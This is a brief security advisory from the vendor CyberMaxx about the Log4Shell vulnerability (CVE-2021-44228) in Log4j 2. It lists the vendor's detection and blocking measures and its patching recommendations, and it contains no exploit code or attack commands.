The HHS Cybersecurity Program has issued a letter warning of a software vulnerability putting healthcare organizations at risk of a cyberattack.

After the release of the Log4j vulnerability notification, CyberMaxx has been working to detect, prevent, and respond to this critical vulnerability.

The vulnerability tracked as CVE-2021-44228 and referred to as “Log4Shell,” affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1. In addition, any products that bundle Log4j 2 are affected. It is remotely exploitable without authentication and over a network without a username and password. The exploitation of this vulnerability can lead to data exfiltration and ransomware.

This vulnerability does not impact CyberMaxx appliances and infrastructure.

In response to this vulnerability, CyberMaxx has implemented the following:

  • Signatures deployed to MAXX SIEM
  • Signatures deployed to MAXX Network
  • Blocking across all sensors of identified Log4j threats and threat actors
  • Utilization of MAXX MDR resources to identify and notify about vulnerable systems
  • Scans initiated in MAXX VRMusing the latest plugins

CyberMaxx recommends that customers review the Apache and Microsoft security advisories below and implement the appropriate security updates to remediate the vulnerability. All systems, including those not customer-facing, are potentially vulnerable to this exploit. Therefore, we also recommend upgrading backend systems and microservices. Microsoft recommends updating Log4j 2 to 2.15.0. CyberMaxx also recommends limiting outbound connections from servers to help mitigate this attack.

References:

https://logging.apache.org/log4j/2.x/security.html

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/